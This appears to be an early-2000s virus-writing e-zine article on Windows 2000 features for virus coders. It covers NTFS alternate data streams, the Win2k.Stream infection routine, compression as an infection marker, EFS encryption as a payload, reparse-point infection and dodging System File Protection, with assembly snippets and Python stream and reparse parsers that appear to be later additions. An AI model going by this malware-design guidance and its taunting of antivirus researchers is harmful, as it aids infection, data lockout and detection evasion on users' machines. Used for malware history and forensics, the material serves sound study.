commit.

What if we would place a copyright in our software ? Something like: "You can freely
distribute this program, as long as you do not change anything. Disassembling and the
forwarding to the Anti-Virus Community is forbidden. This program is protected by
international law. It is just meant for analyzing artificial intelligence on controlled
environments. It is also strictly forbidden to place this program on a non controlled
environment and place it into the wild.. bla bla" Just use their laws, to forbid them
analysing our creations. If you see the virus in a AV-Database you know they have broken
this law and you can take them to the court... ;)

Ok Mr. Kaspersky go and get some good lawyers ;)


Some Tipz & trix for Win2k

1. Introduction
I originally just wanted to write an article about NTFS5. But while reading a lot of
Win2k documentation I found many functions and call sequences that could be very
useful for us virus coders, so I decided to write up some tips and tricks that anybody
can use. I hope I succeeded.
btw, it's my first article written in English, so please be patient. My English sucks,
so if you don't understand something, just contact me.
And now we can begin ...

2. NTFS5
I think you all expected this :) I also read on virus.cyberspace.sk that an English
version of my article for Igi had been requested. I won't translate exactly what I
wrote there, because that one wasn't for coders. This one is :)

2.1. Streams
Streams are not a new feature of NTFS5; NTFS has supported them since the very first
version of WinNT (3.1), but Microsoft kept quiet about them. In Win2k streams are in a
much better position, and the first virus that uses them also exists: Benny/29A's and
my Win2k.Stream. I think you have all heard about it because of the media attention it
got. It's a very easy and simple virus, but with a good idea, I think. We first heard
about streams from GriYo/29A (heya and thx man!) at a meeting in Brno. When Benny came
to stay with me for a few days we decided to write our first joint virus (and my first
virus at all). It was really funny, because we coded through the night and very late
on we didn't even know what we were typing :) There was even a version of Win2k.Stream
with a polymorphic stream name! But the next day, when we woke up and talked about it
in the pub, we decided to write it as simply as possible. And I think we succeeded: the
comment is longer than the whole code XD.
First we'll look at what streams exactly are, and then we'll talk more about our virus.

On filesystems such as FAT and FAT32 a file has exactly one, unnamed, data stream.
What do you think that is? Exactly: the file itself. On NTFS a file can have
additional named data streams as well. A named stream is addressed by appending ':'
and the stream name to the file name (the unnamed stream). Look at this:

We have a file file.txt; that is also the unnamed stream. We would like to create a
new stream inside file.txt and name it "RAT", for example. So we simply put ':' before
the stream name and append it to the file name, giving "file.txt:RAT" somewhere in a
buffer (the full form is "file.txt:RAT:$DATA"; ":$DATA" is the default stream type and
may be left out). Now there's nothing easier than calling CreateFile(A|W) with that
name to create the stream. If creation succeeds you get a handle that you can use as
if it were a normal file (it is, in fact, a normal file). The size reported by
FindFirstFile and Explorer is that of the unnamed stream only, which is why data in an
alternate stream is so easy to overlook.

Well, we have a stream inside the file, but we forgot its name :) Any solution? Yes,
there is one. It is not as comfortable as it should be (Win2k has no stream
enumeration API; FindFirstStreamW only appeared in later Windows versions), but it
works. For our needs we'll use a function called BackupRead, found in kernel32.dll.

Look what MSDN says:

BOOL BackupRead(
HANDLE hFile, // handle to file or directory
LPBYTE lpBuffer, // read buffer
DWORD nNumberOfBytesToRead, // number of bytes to read
LPDWORD lpNumberOfBytesRead, // number of bytes read
BOOL bAbort, // termination type
BOOL bProcessSecurity, // process security options
LPVOID *lpContext // context information
);

For our purposes we can ignore things like security; lpContext must point to a
variable that is NULL before the first call and is passed unchanged to every later
call (BackupRead keeps its position in it). hFile is the handle of the file whose
streams we want to enumerate. lpBuffer receives a structure called WIN32_STREAM_ID.

WIN32_STREAM_ID struc
dwStreamId dd ? ; 1 = BACKUP_DATA (the unnamed stream), 4 = BACKUP_ALTERNATE_DATA
dwStreamAttributes dd ? ; (a named data stream), 3 = BACKUP_SECURITY_DATA, ...
Size dq ? ; length of the stream content in bytes
dwStreamNameSize dd ? ; length of the name in bytes (0 for the unnamed stream)
cStreamName dw ANYSIZE_ARRAY dup (?) ; name in Unicode, e.g. ":RAT:$DATA"
WIN32_STREAM_ID ends

The first 20 bytes of this structure form the header of each stream. Then comes the
name of the stream, and after the name the content of the stream. BackupRead presents
the whole file as one flat sequence of such records, so to enumerate all streams you
read a header, read the name, skip the content with BackupSeek and repeat. Note that
at the end of the data BackupRead returns TRUE with zero bytes read, not FALSE, so the
loop must check the byte count as well, and that a final call with bAbort = TRUE is
required to release the memory behind lpContext. Just look at the code snippet:

; in ebx - handle of the file whose streams we enumerate (opened with
; GENERIC_READ; no backup privilege is needed for a file the caller can read)

lpcontext dd 0 ; must be 0 before the first BackupRead call
bytesread dd ?
buffer db 20 + 1024 dup (?) ; 20-byte header followed by the stream name

enumerate_streams:
push offset lpcontext
push 0 ; bProcessSecurity
push 0 ; bAbort
push offset bytesread
push 20 ; size of the header (up to cStreamName)
push offset buffer
push ebx
call BackupRead ; read the stream header
test eax, eax
jz end_enumerate_streams ; error ?
cmp dword ptr [bytesread], 20 ; end of data: BackupRead returns TRUE
jb end_enumerate_streams ; with 0 bytes read, so check the count
push offset lpcontext
push 0
push 0
push offset bytesread
push dword ptr [buffer+16] ; dwStreamNameSize (bytes, 0 if unnamed)
push offset buffer+20 ; the name lands right behind the header
push ebx
call BackupRead ; read the stream name
test eax, eax
jz end_enumerate_streams ; error ?
; Now buffer+20 holds the name in Unicode
; (e.g. ":STR:$DATA"), [buffer+16] is its
; length in bytes and [buffer] the stream
; id: 1 = unnamed data, 4 = named (alternate)
; data stream
push offset lpcontext ; BackupRead presents the file and all its
@pushvar <dd 0> ; streams as one flat byte sequence, so
@pushvar <dd 0> ; we must seek past the stream content
push dword ptr [buffer+12] ; Size, high dword
push dword ptr [buffer+8] ; Size, low dword
push ebx
call BackupSeek
test eax, eax
jz end_enumerate_streams ; error ?
jmp enumerate_streams ; go on with the next stream header ...
end_enumerate_streams:
push offset lpcontext ; one more call with bAbort = TRUE releases
push 0 ; the memory BackupRead allocated for
push 1 ; lpcontext
push offset bytesread
push 0
push 0
push ebx
call BackupRead

Well, I think that is all you need to know about streams for the beginning. Do some
more coding with them and you will become familiar with them and use them in the
future. Remember the words from Kaspersky/AVP: "Stream companion is a new breakthrough
infection which is very hard to detect!" (Any scanner that walks a file with BackupRead,
as the snippet above does, sees the extra stream just as easily, so the trick only hides
data from tools that look at the unnamed stream alone.) Just give the AVers some more
wrinkles ...
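As an added example (not code from the article), the same walk the assembly above does
with BackupRead and BackupSeek, carried out over a byte string in Python. BackupRead
hands back a flat sequence of WIN32_STREAM_ID records: a 20-byte header, an optional
UTF-16LE name and then the stream content. Parsing that format offline is enough to
check the layout, and it is what a forensic tool does with a raw backup-stream dump.
The sample bytes and the stream name ":STR:$DATA" are constructed for this example; the
stream ids are the winbase.h constants.

```python
"""Parse the stream records BackupRead returns for an NTFS file (added example)."""
import struct
from dataclasses import dataclass

# dwStreamId values from winbase.h
BACKUP_DATA = 1            # the unnamed ::$DATA stream (the "file itself")
BACKUP_EA_DATA = 2
BACKUP_SECURITY_DATA = 3
BACKUP_ALTERNATE_DATA = 4  # a named data stream, e.g. ":STR:$DATA"
BACKUP_LINK = 5
BACKUP_PROPERTY_DATA = 6
BACKUP_OBJECT_ID = 7
BACKUP_REPARSE_DATA = 8
BACKUP_SPARSE_BLOCK = 9

# dwStreamId, dwStreamAttributes, Size (LARGE_INTEGER), dwStreamNameSize:
# 4 + 4 + 8 + 4 = 20 bytes, the count the first BackupRead in the article asks for.
STREAM_HEADER = struct.Struct("<IIQI")
STREAM_HEADER_SIZE = STREAM_HEADER.size


@dataclass
class StreamRecord:
    stream_id: int
    attributes: int
    name: str      # "" for the unnamed stream, ":name:$DATA" for an ADS
    data: bytes


def parse_backup_stream(buf: bytes) -> list:
    """Walk a BackupRead byte sequence and return one record per stream.

    Stops cleanly at the end of the data, which a BackupRead loop has to do as
    well (the API returns TRUE with zero bytes read there, not FALSE), and
    raises on a truncated record instead of reusing a stale header.
    """
    records = []
    off = 0
    while off < len(buf):
        if len(buf) - off < STREAM_HEADER_SIZE:
            raise ValueError("truncated stream header at offset %d" % off)
        stream_id, attrs, size, name_size = STREAM_HEADER.unpack_from(buf, off)
        off += STREAM_HEADER_SIZE
        name = buf[off:off + name_size].decode("utf-16-le")
        off += name_size
        data = buf[off:off + size]
        if len(data) != size:
            raise ValueError("stream %r truncated: want %d bytes, have %d"
                             % (name, size, len(data)))
        off += size  # the equivalent of the BackupSeek past the content
        records.append(StreamRecord(stream_id, attrs, name, data))
    return records


def alternate_data_streams(records: list) -> list:
    """Only the named $DATA streams: the place where a companion hides."""
    return [r for r in records if r.stream_id == BACKUP_ALTERNATE_DATA]


def build_record(stream_id: int, name: str, data: bytes) -> bytes:
    """Serialise one record in BackupRead's layout (used to construct input)."""
    wname = name.encode("utf-16-le")
    return STREAM_HEADER.pack(stream_id, 0, len(data), len(wname)) + wname + data


# Constructed sample (made up for this example): an executable whose unnamed
# stream is 6 bytes long and which carries one alternate data stream named STR,
# the shape a Win2k.Stream-style infection leaves behind.
SAMPLE = (
    build_record(BACKUP_DATA, "", b"MZ\x90\x00\x03\x00")
    + build_record(BACKUP_ALTERNATE_DATA, ":STR:$DATA", b"original program body")
)


def ads_names(buf: bytes = SAMPLE) -> list:
    """Names of the alternate data streams found in a BackupRead dump."""
    return [r.name for r in alternate_data_streams(parse_backup_stream(buf))]


if __name__ == "__main__":
    for rec in parse_backup_stream(SAMPLE):
        print("id=%d name=%-12r size=%d" % (rec.stream_id, rec.name, len(rec.data)))
```

The parser assumes the plain layout the article describes (header, name, content); a
real dump of a sparse file also contains BACKUP_SPARSE_BLOCK records, which carry their
own headers and are skipped the same way.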

2.1.1. Win2k.Stream
And now something more about our babe. After execution it tries, via FindFirstFile and
FindNextFile, to find victims to infect. It infects only *.exe files in the current
directory (there was no reason to make it spread further). The infection works as
follows:

first it checks whether the file is compressed (see the next chapter), which the virus
uses as its "already infected" marker
then it creates a temp file and copies the main stream to it
copies the virus body to the main (unnamed) stream of the victim
moves the temp file to the stream <victim_file>:STR
compresses the file

so after infection the file looks like this (these are the diagrams from AVP's
description :)):

File before infection File after infection

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³°°°°°°°°°°°°°°°°°°°³ ³°°°°°°°°°°°°°°°°°°°³
³°°°°°°°°°°°°°°°°°°°³ ³°°° main stream°°°°³
³°°°°°°°°°°°°°°°°°°°³ ³°°° virus body°°°°°³
³°°°°main stream°°°°³ ³°°°°°°°°°°°°°°°°°°°³
³°°°°°°°°°°°°°°°°°°°³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³°°°°program body°°°³ ³°°°°°°°°°°°°°°°°°°°³
³°°°°°°°°°°°°°°°°°°°³ ³°additional stream°³
³°°°°°°°°°°°°°°°°°°°³ ³°°°°°° :STR °°°°°°°³
³°°°°°°°°°°°°°°°°°°°³ ³°°°°°°°°°°°°°°°°°°°³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³±±±±±±±±±±±±±±±±±±±³ ³±±±±±±±±±±±±±±±±±±±³
³±±service streams±±³ ³±±service streams±±³
³±±±±±±±±±±±±±±±±±±±³ ³±±±±±±±±±±±±±±±±±±±³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

then it looks for the next file, etc. At the end it simply runs the stream
<victim_file>:STR, where the victim's original body now lives, via CreateProcess
(Win2k allows an image to be executed straight from a named stream). When the victim
finishes, the virus calls ExitProcess and ends. If any error occurs it displays the
following text:

"Win2k.Stream by Benny/29A & Ratter"

"This cell has been infected by [Win2k.Stream] virus!"

and ends. That is also the payload on FAT, FAT32 and other filesystems that do not
support streams. And that's all. Simple, isn't it?

2.2. Compression and encryption

We were also the first to use, in our babe, the NTFS ability to compress files. It is
transparent to applications, so it is a great way to reduce the drop in free disk
space after an infection. To compress a file we must ask the filesystem driver via
DeviceIoControl with the right IoControlCode ... look at this code snippet from
Win2k.Stream and also from my Win2k.Purple (the first to do this was Benny/29A in his
Win32.HIV; at our mini-meeting he decided that we would use it in Win2k.Stream first
...)

FSCTL_SET_COMPRESSION equ 9 shl 16 or 3 shl 14 or 16 shl 2 ; = 9C040h

xor eax, eax
push eax ; lpOverlapped = NULL
@pushvar <dd ?> ; lpBytesReturned
push eax ; nOutBufferSize = 0
push eax ; lpOutBuffer = NULL
push 4 ; nInBufferSize (a USHORT is needed, 4 bytes are accepted)
@pushvar <dd 1> ; lpInBuffer -> COMPRESSION_FORMAT_DEFAULT
push FSCTL_SET_COMPRESSION
push ebx ; handle opened with read and write access
call DeviceIoControl ; NTFS compresses the file: saves disk space
; and marks it as already infected :)

and now what MSDN says (the generic DeviceIoControl prototype, with the parameters
as FSCTL_SET_COMPRESSION expects them):

BOOL DeviceIoControl(
(HANDLE) hDevice, // handle to file, opened for FILE_READ_DATA | FILE_WRITE_DATA
FSCTL_SET_COMPRESSION, // dwIoControlCode operation
(LPVOID) lpInBuffer, // pointer to a USHORT: COMPRESSION_FORMAT_NONE (0),
// COMPRESSION_FORMAT_DEFAULT (1) or COMPRESSION_FORMAT_LZNT1 (2)
(DWORD) nInBufferSize, // sizeof(USHORT)
NULL, // lpOutBuffer; must be NULL
0, // nOutBufferSize; must be zero
(LPDWORD) lpBytesReturned, // number of bytes returned
(LPOVERLAPPED) lpOverlapped // OVERLAPPED structure
);

FSCTL_GET_COMPRESSION reads the state back the same way, with the USHORT returned in
lpOutBuffer and no input buffer. I think it is clear, and also simple to implement in
your virus. Just do it!

The next thing is encryption. It can easily be used by calling the functions
EncryptFile and DecryptFile :). I think it could be applied as a payload, because if
you encrypt a file on a Win2k machine, only the user who encrypted it (and, if one is
configured, the EFS recovery agent) has access to it afterwards. After encrypting a few
files there can be quite some chaos on the machine :) Two caveats: it only works on
NTFS volumes with EFS available, and NTFS does not allow a file to be compressed and
encrypted at the same time, so this cannot be combined with the compression trick from
the previous section on the same file.

BOOL EncryptFile(
LPCTSTR lpFileName // file name
);

BOOL DecryptFile(
LPCTSTR lpFileName, // file name
DWORD dwReserved // reserved; must be zero
);

I think I'm repeating myself, but: easy to implement, easy to use ...

2.3. Sparse files

I don't know whether anyone will find a use for sparse files in virus coding, but I
find them a very nice feature of NTFS5, so I would like to talk about them here. Have
you ever imagined how much space is wasted in databases where most of the file is
zeros (free records)? A lot :) And here comes a solution for such applications: sparse
files (sounds like an M$ advertisement :)). We as programmers can tell the filesystem
where the holes (runs of zeros) in the file are, and the filesystem will then only
store to disk the data we said is not zero ... the code snippet will show more:

BOOL DeviceIoControl(
(HANDLE) hDevice, // handle to a file
FSCTL_SET_SPARSE, // dwIoControlCode operation
NULL, // lpInBuffer; must be NULL
0, // nInBufferSize; must be zero
NULL, // lpOutBuffer; must be NULL
0, // nOutBufferSize; must be zero
(LPDWORD) lpBytesReturned, // number of bytes returned
(LPOVERLAPPED) lpOverlapped // OVERLAPPED structure
);

FSCTL_SET_SPARSE equ 9 shl 16 or 2 shl 14 or 49 shl 2 ; = 980C4h, as in the Win2k SDK
; (current SDKs define it with FILE_SPECIAL_ACCESS instead of FILE_WRITE_DATA,
; which gives 900C4h; take the value from the winioctl.h you build against)


FILE_BEGIN equ 0

push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push CREATE_ALWAYS ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 0 ; dwShareMode
push GENERIC_WRITE ; dwDesiredAccess
@pushsz "SparseFile" ; create the file SparseFile
call CreateFileA
xchg eax, ebx ; ebx = handle
xor eax, eax
push eax ; lpOverlapped = NULL
@pushvar <dd ?> ; lpBytesReturned
push eax ; nOutBufferSize = 0
push eax ; lpOutBuffer = NULL
push eax ; nInBufferSize = 0
push eax ; lpInBuffer = NULL
push FSCTL_SET_SPARSE ; mark this file as sparse
push ebx
call DeviceIoControl
push FILE_BEGIN
@pushvar <dd 8> ; lpDistanceToMoveHigh -> 8, i.e. 8 * 4 GB
push 0 ; lDistanceToMove (low part) = 0
push ebx ; move the file pointer to 32 GB (hyea Gig :))
call SetFilePointer
push ebx ; SetEndOfFile extends the file to 32 GB;
call SetEndOfFile ; on a sparse file the new range is a hole
push ebx
call CloseHandle

This code snippet creates a file whose size is 32 GB, while its allocated size on disk
is practically zero (GetCompressedFileSize reports the allocated size, the "Size on
disk" figure in Explorer) :) Nice, isn't it? Note that the FSCTL must be sent before
the file is extended; extending a file that is not yet marked sparse allocates the
clusters for real. And how do we tell the filesystem that an already written region of
the file should become a hole? Here's the prototype of the function we can use for
that ...

BOOL DeviceIoControl(
(HANDLE) hDevice, // handle to a file
FSCTL_SET_ZERO_DATA, // dwIoControlCode operation
(LPVOID) lpInBuffer, // pointer to FILE_ZERO_DATA_INFORMATION
(DWORD) nInBufferSize, // size of input buffer
NULL, // lpOutBuffer; must be NULL
0, // nOutBufferSize; must be zero
(LPDWORD) lpBytesReturned, // number of bytes returned
(LPOVERLAPPED) lpOverlapped // OVERLAPPED structure
);

typedef struct _FILE_ZERO_DATA_INFORMATION {
LARGE_INTEGER FileOffset; // first byte of the range to zero
LARGE_INTEGER BeyondFinalZero; // first byte after the range
} FILE_ZERO_DATA_INFORMATION, *PFILE_ZERO_DATA_INFORMATION;

On a file marked sparse the clusters of that range are released; on a normal file the
range is simply overwritten with zeros. And that's all about sparse files for now ...
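The two `equ` lines in this chapter (FSCTL_SET_COMPRESSION above and FSCTL_SET_SPARSE
here) hand-encode the CTL_CODE macro from winioctl.h. As an added example that is not
part of the article, the following Python reproduces that macro, decodes an arbitrary
control code back into its fields (handy when an FSCTL shows up in a driver or ETW
trace), re-derives the article's constants instead of typing them in, and packs the
two input buffers this chapter talks about: the USHORT for FSCTL_SET_COMPRESSION and
the FILE_ZERO_DATA_INFORMATION structure for FSCTL_SET_ZERO_DATA. The constant
names and values are the SDK's; the 32 GB range in the usage is the article's own.

```python
"""Build and decode NTFS FSCTL codes and their input buffers (added example)."""
import struct

FILE_DEVICE_FILE_SYSTEM = 0x00000009
METHOD_BUFFERED = 0
FILE_ANY_ACCESS = 0          # FILE_SPECIAL_ACCESS has the same value
FILE_READ_DATA = 0x0001      # same bit as FILE_READ_ACCESS
FILE_WRITE_DATA = 0x0002     # same bit as FILE_WRITE_ACCESS

COMPRESSION_FORMAT_NONE = 0
COMPRESSION_FORMAT_DEFAULT = 1
COMPRESSION_FORMAT_LZNT1 = 2


def ctl_code(device_type: int, function: int, method: int, access: int) -> int:
    """The CTL_CODE macro from winioctl.h."""
    return (device_type << 16) | (access << 14) | (function << 2) | method


def decode_ctl_code(code: int) -> dict:
    """Inverse of ctl_code: split a 32-bit I/O control code into its fields."""
    return {
        "device_type": (code >> 16) & 0xFFFF,
        "access": (code >> 14) & 0x3,
        "function": (code >> 2) & 0xFFF,
        "method": code & 0x3,
    }


# The article's constants, re-derived from the macro.
FSCTL_SET_COMPRESSION = ctl_code(FILE_DEVICE_FILE_SYSTEM, 16, METHOD_BUFFERED,
                                 FILE_READ_DATA | FILE_WRITE_DATA)   # 0x9C040
FSCTL_SET_SPARSE_WIN2K = ctl_code(FILE_DEVICE_FILE_SYSTEM, 49, METHOD_BUFFERED,
                                  FILE_WRITE_DATA)                  # 0x980C4
# Current SDKs define FSCTL_SET_SPARSE with FILE_SPECIAL_ACCESS instead:
FSCTL_SET_SPARSE = ctl_code(FILE_DEVICE_FILE_SYSTEM, 49, METHOD_BUFFERED,
                            FILE_ANY_ACCESS)                        # 0x900C4
FSCTL_SET_ZERO_DATA = ctl_code(FILE_DEVICE_FILE_SYSTEM, 50, METHOD_BUFFERED,
                               FILE_WRITE_DATA)                     # 0x980C8


def compression_state_buffer(state: int = COMPRESSION_FORMAT_DEFAULT) -> bytes:
    """lpInBuffer for FSCTL_SET_COMPRESSION: a single USHORT."""
    if state not in (COMPRESSION_FORMAT_NONE, COMPRESSION_FORMAT_DEFAULT,
                     COMPRESSION_FORMAT_LZNT1):
        raise ValueError("unknown compression state %d" % state)
    return struct.pack("<H", state)


def zero_data_information(file_offset: int, beyond_final_zero: int) -> bytes:
    """lpInBuffer for FSCTL_SET_ZERO_DATA.

    FileOffset is the first byte to zero, BeyondFinalZero the first byte
    after the range; both are LARGE_INTEGER.  On a file marked sparse the
    range becomes a hole and its clusters are released.
    """
    if not 0 <= file_offset <= beyond_final_zero:
        raise ValueError("need 0 <= FileOffset <= BeyondFinalZero")
    return struct.pack("<qq", file_offset, beyond_final_zero)


def hole_length(info: bytes) -> int:
    """Bytes a FILE_ZERO_DATA_INFORMATION buffer covers."""
    start, end = struct.unpack("<qq", info)
    return end - start


if __name__ == "__main__":
    for name, code in (("FSCTL_SET_COMPRESSION", FSCTL_SET_COMPRESSION),
                       ("FSCTL_SET_SPARSE (Win2k SDK)", FSCTL_SET_SPARSE_WIN2K),
                       ("FSCTL_SET_SPARSE", FSCTL_SET_SPARSE),
                       ("FSCTL_SET_ZERO_DATA", FSCTL_SET_ZERO_DATA)):
        print("%-30s %#07x %r" % (name, code, decode_ctl_code(code)))
    # the 32 GB hole from the article's sparse-file snippet
    print(hole_length(zero_data_information(0, 8 << 32)))
```

The access field is what the I/O manager checks against the handle: a code built with
FILE_READ_DATA | FILE_WRITE_DATA (value 3) fails with ERROR_ACCESS_DENIED on a handle
opened for GENERIC_WRITE alone, which is the usual reason an FSCTL that "should work"
does not.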

2.4. Reparse Points

This thing is my little favourite :) What are reparse points? A reparse point is a
block of user-defined data associated with a file or directory. Only the application
that set it and the file system filter driver that handles it understand the content
of that data. When NTFS opens a file and recognises that the file has a reparse point,
it first tries to find the file system filter that owns it (the structure carries a
tag that identifies the owner). If it finds one, it passes the raw data (at most 16 KB)
to that filter, and what the driver does with it is up to the driver. A filter driver
you install sits on top of the file system drivers, and what you intercept is up to
you. Do you see it? You can do anything with such a file. You can "infect" files just
by setting a reparse point on them: change some data in the file, store the original
in the reparse point, restore that content whenever the file is opened and re-infect
it when it is closed. Without your file system filter the file would simply be broken
... With this you can infect !_all_! files! I must say it is charming. But it has some
holes. We must work out how to spread the mother (the file system driver), and before
that we must write it :) That is a bit of a problem, because it needs the IFS Kit (the
kit for writing installable file system drivers) and M$ wants too much money (for me
...) for it. If someone has it, please contact me. It also needs more study. But one
day it will come :))
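What the filesystem actually stores behind a reparse point, and what a filter or a
forensic tool gets back from FSCTL_GET_REPARSE_POINT, is a small header followed by
the opaque data: the REPARSE_DATA_BUFFER form for Microsoft tags, or the
REPARSE_GUID_DATA_BUFFER form (with a 16-byte owner GUID after the header) for
third-party tags. The tag's high bit tells the two apart. The following parser is an
added example, not the article's code, and goes a little beyond the text by also
decoding the mount-point payload, so that a constructed junction can be checked end
to end. The tag values and size limit are the SDK's; the junction target, the vendor
tag 0x1234 and its GUID are made up for the example.

```python
"""Parse the user-defined data block behind an NTFS reparse point (added example)."""
import struct
import uuid

MAXIMUM_REPARSE_DATA_BUFFER_SIZE = 16 * 1024   # the "at most 16 KB" above

IO_REPARSE_TAG_MOUNT_POINT = 0xA0000003        # junction / volume mount point
IO_REPARSE_TAG_SYMLINK = 0xA000000C

# Common header: ReparseTag (ULONG), ReparseDataLength (USHORT), Reserved (USHORT).
# A non-Microsoft tag is followed by the owning filter's GUID.
REPARSE_HEADER = struct.Struct("<IHH")
# Mount-point payload header: SubstituteName and PrintName offset/length pairs,
# both relative to the PathBuffer that follows.
MOUNT_POINT_HEADER = struct.Struct("<HHHH")


def is_microsoft_tag(tag: int) -> bool:
    return bool(tag & 0x80000000)


def is_name_surrogate(tag: int) -> bool:
    """Set for tags that redirect a name (junctions, symlinks)."""
    return bool(tag & 0x20000000)


def parse_reparse_buffer(buf: bytes) -> dict:
    """Split a reparse buffer into tag, optional owner GUID and payload bytes."""
    if len(buf) > MAXIMUM_REPARSE_DATA_BUFFER_SIZE:
        raise ValueError("reparse buffer exceeds 16 KiB")
    if len(buf) < REPARSE_HEADER.size:
        raise ValueError("short reparse header")
    tag, data_len, _reserved = REPARSE_HEADER.unpack_from(buf, 0)
    off = REPARSE_HEADER.size
    guid = None
    if not is_microsoft_tag(tag):
        guid = uuid.UUID(bytes_le=buf[off:off + 16])
        off += 16
    data = buf[off:off + data_len]
    if len(data) != data_len:
        raise ValueError("ReparseDataLength runs past the buffer")
    return {"tag": tag, "microsoft": is_microsoft_tag(tag),
            "name_surrogate": is_name_surrogate(tag), "guid": guid, "data": data}


def decode_mount_point(data: bytes) -> dict:
    """Payload of IO_REPARSE_TAG_MOUNT_POINT: substitute and print names."""
    sub_off, sub_len, prn_off, prn_len = MOUNT_POINT_HEADER.unpack_from(data, 0)
    path = data[MOUNT_POINT_HEADER.size:]
    return {
        "substitute": path[sub_off:sub_off + sub_len].decode("utf-16-le"),
        "print": path[prn_off:prn_off + prn_len].decode("utf-16-le"),
    }


def build_mount_point(substitute: str, print_name: str) -> bytes:
    """Serialise a junction's reparse buffer (used here to construct input).

    Both names are NUL-terminated in the PathBuffer, as mklink writes them.
    """
    sub = substitute.encode("utf-16-le")
    prn = print_name.encode("utf-16-le")
    path = sub + b"\x00\x00" + prn + b"\x00\x00"
    payload = MOUNT_POINT_HEADER.pack(0, len(sub), len(sub) + 2, len(prn)) + path
    return REPARSE_HEADER.pack(IO_REPARSE_TAG_MOUNT_POINT, len(payload), 0) + payload


def build_guid_reparse_buffer(tag: int, guid: uuid.UUID, data: bytes) -> bytes:
    """Serialise a third-party REPARSE_GUID_DATA_BUFFER."""
    if is_microsoft_tag(tag):
        raise ValueError("third-party tags must not set the Microsoft bit")
    return REPARSE_HEADER.pack(tag, len(data), 0) + guid.bytes_le + data


# Constructed samples (made up for this example): a junction to C:\Target and a
# third-party reparse point with a hypothetical tag and GUID.
JUNCTION = build_mount_point("\\??\\C:\\Target", "C:\\Target")
VENDOR_GUID = uuid.UUID("12345678-1234-5678-1234-567812345678")
VENDOR_POINT = build_guid_reparse_buffer(0x00001234, VENDOR_GUID, b"filter-private")


if __name__ == "__main__":
    info = parse_reparse_buffer(JUNCTION)
    print(hex(info["tag"]), decode_mount_point(info["data"]))
    print(parse_reparse_buffer(VENDOR_POINT)["guid"])
```

A tag with the Microsoft bit clear and a GUID nobody on the box owns is exactly the
artefact the scheme described above would leave behind, and it is cheap to look for
with FindFirstFile's FILE_ATTRIBUTE_REPARSE_POINT plus this header decode.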

2.5. Mounting
There is not much to say about this topic. I think most of you know mounting from
various *nix systems such as Linux. If you want to set a volume mount point you need
three functions:

GetVolumeNameForVolumeMountPoint, SetVolumeMountPoint and sometimes
DeleteVolumeMountPoint.

(The mount point given to SetVolumeMountPoint must be an empty directory on an NTFS
volume, and the volume is identified by its \\?\Volume{GUID}\ name, which is what
GetVolumeNameForVolumeMountPoint returns.) If you want the documentation, let me know
and I'll give it to you.

Just one thing to mention: *nixes have had this feature for 30 years. Microsoft
implemented it only now. Does that mean a 30-year gap between the technologies?
Everyone must answer that question for themselves :))

That's all for now about NTFS5. There is more to say on each of the topics I touched
on in this article, but I think it is enough for the beginning. Just code and study,
and if you have problems, contact me. If I can help you (== if I know the answer) I
will.

3. Job kernel object

Do you have problems managing processes in your virus? Your virus uses IPC and creates
a lot of processes, and you want a comfortable way to destroy them all? In Win2k you
can use a job kernel object, which lets you group processes together and create a
sandbox that restricts what those processes are allowed to do. Then you can destroy
all the processes just by terminating the job object. Let's go deeper.

First you must create a job object. This is done with the CreateJobObject API
function.

HANDLE CreateJobObject(
LPSECURITY_ATTRIBUTES lpJobAttributes, // SD (can be NULL for our purposes)
LPCTSTR lpName // job name (NULL gives an unnamed job :))
);

Now we have created a job and have a handle to it. Next we must assign some process to
it. Just use AssignProcessToJobObject ...

BOOL AssignProcessToJobObject(
HANDLE hJob, // handle to job
HANDLE hProcess // handle to process
);

Easy. Two things to keep in mind: on Win2k a process can belong to only one job, so
the call fails for a process that is already in one, and children of a process in a
job are placed in the same job unless breakaway is allowed. To catch a child before it
runs any code, create it with CREATE_SUSPENDED, assign it, then ResumeThread. We could
now place some restrictions on the processes within the job (SetInformationJobObject),
but that is not necessary for now. I promised termination of all processes with one
API function, right? Here it is ...

BOOL TerminateJobObject(
HANDLE hJob, // handle to job
UINT uExitCode // exit code
);

After calling this function with the right job handle, all processes within the job
are terminated.

4. Otherz
- In Win2k the Toolhelp32 library is implemented. You can again use functions such as
CreateToolhelp32Snapshot, Process32First etc. This is very useful when writing
per-process (multi-process) residency for Win9x and Win2k. Under WinNT 4 you could
only use EnumProcesses and EnumProcessModules from psapi.dll; those two did not exist
on Win9x, so viruses carried two code paths for the two operating systems.
- For easier access to the registry you can use functions from the Shell Lightweight
API (shlwapi.dll). These functions are:
SHDeleteEmptyKey
SHDeleteKey
SHDeleteValue
SHGetValue
SHSetValue
SHQueryValueEx
SHEnumKeyEx
SHEnumValue
SHQueryInfoKey
SHRegGetBoolUSValue
E.g. to read a value you had to open the registry subkey, call RegQueryValueEx and
then close the key. SHGetValue does everything in one step.
- When you are infecting a file, check it with SFCIsFileProtected (sfc.dll, takes a
Unicode path), which tells you whether the file is under System File Protection. A
protected file that you modify is restored by WFP from the dllcache (or the install
media), so infecting it gains nothing. (I'm writing an article about how to fuck SFP,
and then it will be easier :))
- If you want to get to a system directory such as system32, use the function
ExpandEnvironmentStrings, which lets you use environment variables. Until now you had
to get the Windows directory and append "system32"; now you just expand
"%SystemRoot%\system32" (there is no %system32% variable, but %SystemRoot% and
%windir% exist) and get the full path back.

DWORD ExpandEnvironmentStrings(
LPCTSTR lpSrc, // string with environment variables
LPTSTR lpDst, // string with expanded strings
DWORD nSize // maximum characters in expanded string
);

5. End
I need rest !!!
If you aren't crazy after reading this article then you are not normal :)
For such people a little song:

Settle for nothing

A jail cell is freedom from the pain in my home
Hatred passed on, passed on and passed on
A world of violent rage
But it's one that I can recognize
Having never seen the color of my father's eyes
Yes, I dwell in hell but it's a hell that I can grip
I tried to grip my family
But I slipped
To escape from the pain and an existence mundane
